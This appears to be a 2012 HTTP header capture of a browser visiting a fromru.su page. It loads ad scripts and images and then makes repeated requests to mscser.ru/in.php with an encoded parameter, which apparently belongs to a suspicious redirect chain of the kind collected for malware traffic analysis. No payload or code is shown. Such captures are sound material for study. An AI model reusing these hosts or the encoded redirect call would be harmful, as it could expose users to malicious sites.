GET /1947/1947095_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 2622 Last-Modified: Fri, 26 Oct 2012 09:19:04 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /1420/1420799_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 3854 Last-Modified: Fri, 12 Oct 2012 07:26:29 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /1250/1250166_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 3773 Last-Modified: Tue, 19 Jul 2011 08:19:20 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /1941/1941792_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 2687 Last-Modified: Wed, 24 Oct 2012 05:01:24 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /t/base.js HTTP/1.1 Host: content.relax.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 20408 Last-Modified: Tue, 06 Nov 2012 08:54:42 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /t/inline_pushup.js?20121061 HTTP/1.1 Host: content.relax.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 5394 Last-Modified: Tue, 25 Sep 2012 15:39:37 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /t/inline_pushup_right_bottom.js?20121061 HTTP/1.1 Host: content.relax.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 4745 Last-Modified: Thu, 27 Sep 2012 13:34:49 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /652097/memori_02.jpg HTTP/1.1 Host: content.relax.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 34488 Last-Modified: Mon, 24 Sep 2012 08:55:54 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /storage/ HTTP/1.1 Host: content.medialand.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ Cookie: ctc=on%5F3; id=250780777	HTTP/1.1 200 OK Content-Type: text/html; charset=windows-1251 Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 1679 Last-Modified: Tue, 14 Aug 2012 14:00:57 GMT Connection: keep-alive Accept-Ranges: bytes
GET /storage/storage.js HTTP/1.1 Host: content.medialand.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://content.medialand.ru/storage/ Cookie: ctc=on%5F3; id=250780777	HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=windows-1251 Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 6105 Last-Modified: Tue, 14 Aug 2012 13:27:48 GMT Connection: keep-alive Accept-Ranges: bytes
GET /swfobject/2.2/swfobject.min.js HTTP/1.1 Host: yandex.st User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://content.medialand.ru/storage/	HTTP/1.1 200 OK Content-Type: application/x-javascript Access-Control-Allow-Origin: * Vary: Accept-Encoding Content-Encoding: gzip Last-Modified: Wed, 21 Oct 2009 13:16:03 GMT Etag: "1632719802" Expires: Thu, 15 Sep 2022 22:36:20 GMT Cache-Control: max-age=311040000 Accept-Ranges: bytes Content-Length: 3944 Date: Tue, 06 Nov 2012 22:36:20 GMT Server: lighttpd/1.4.26
GET /close_3.png HTTP/1.1 Host: content.relax.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/png Server: nginx Date: Tue, 06 Nov 2012 22:36:21 GMT Content-Length: 424 Last-Modified: Thu, 20 Sep 2012 16:48:48 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /favicon.ico HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: __utma=1.59269207.1352241379.1352241379.1352241379.1; __utmb=1.1.10.1352241379; __utmc=1; __utmz=1.1352241379.1.1.utmcsr=(direct)\|utmccn=(direct)\|utmcmd=(none)	HTTP/1.1 404 Not Found Content-Type: image/gif Server: nginx Date: Tue, 06 Nov 2012 22:36:21 GMT Content-Length: 43 Connection: keep-alive
GET /favicon.ico HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: __utma=1.59269207.1352241379.1352241379.1352241379.1; __utmb=1.1.10.1352241379; __utmc=1; __utmz=1.1352241379.1.1.utmcsr=(direct)\|utmccn=(direct)\|utmcmd=(none)	HTTP/1.1 404 Not Found Content-Type: image/gif Server: nginx Date: Tue, 06 Nov 2012 22:36:22 GMT Content-Length: 43 Connection: keep-alive
GET /in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQwMBAEABA== HTTP/1.1 Host: mscser.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/
GET /in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQwMBAEABA== HTTP/1.1 Host: mscser.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/